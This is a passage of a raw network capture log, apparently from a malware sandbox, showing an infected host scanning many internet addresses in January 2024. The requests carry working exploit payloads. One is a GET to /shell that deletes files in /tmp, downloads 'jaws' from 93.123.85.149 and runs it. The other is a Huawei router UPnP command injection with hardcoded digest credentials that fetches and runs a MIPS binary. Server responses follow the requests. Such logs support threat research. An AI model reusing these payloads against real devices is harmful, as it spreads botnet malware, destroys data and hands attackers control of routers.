                                                            Jan 26, 2024 15:32:44.763665915 CET1286INData Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20
                                                            Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to webserver93.turnkeywebspace.com's <a href="mailto:
                                                            Jan 26, 2024 15:32:44.763679028 CET392INData Raw: 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 63 70 61 6e 65 6c 77 68 6d 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 63 70 6c 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65
                                                            Data Ascii: /?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            561192.168.2.2357134128.199.1.7980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:44.664037943 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:44.821332932 CET497INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:44 GMT
                                                            Server: Apache/2.4.29 (Ubuntu)
                                                            Content-Length: 303
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 79 69 6e 67 6b 65 6c 69 2e 6d 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.29 (Ubuntu) Server at yingkeli.me Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            562192.168.2.235238423.72.37.3680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:44.709069967 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:44.911397934 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:32:44 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:44 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 34 32 35 34 38 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 36 34 26 23 34 36 3b 32 61 30 38 39 61 63 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;24254817&#46;1706279564&#46;2a089aca</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            563192.168.2.236020889.41.249.20580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:44.750283957 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:44.993741989 CET115INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/plain; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                            Data Ascii: 400 Bad Request


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            564192.168.2.23428305.253.0.5280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:44.946639061 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:45.153311968 CET115INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/plain; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                            Data Ascii: 400 Bad Request


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            565192.168.2.2347918176.97.247.24880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:44.957952023 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:45.175863028 CET115INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/plain; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                            Data Ascii: 400 Bad Request


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            566192.168.2.235891694.123.190.4180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:44.993644953 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            567192.168.2.233748847.99.247.17780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:45.240840912 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:45.569453001 CET490INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:32:44 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            568192.168.2.235647047.100.202.11780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:45.243254900 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:45.571825981 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.22.0
                                                            Date: Fri, 26 Jan 2024 14:32:45 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            569192.168.2.2357014120.24.228.4480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:46.097536087 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:46.437433958 CET407INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:46 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Location: https://wanwang.aliyun.com/hosting/ipvisit_stop
                                                            Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            570192.168.2.234772069.58.6.20580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:46.232134104 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:46.367238045 CET525INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:45 GMT
                                                            Server: Apache
                                                            Content-Length: 347
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            571192.168.2.234467694.120.47.16580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:46.351289034 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            572192.168.2.2339998156.241.13.3737215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:46.480372906 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:47.996715069 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:49.756469011 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:53.467922926 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
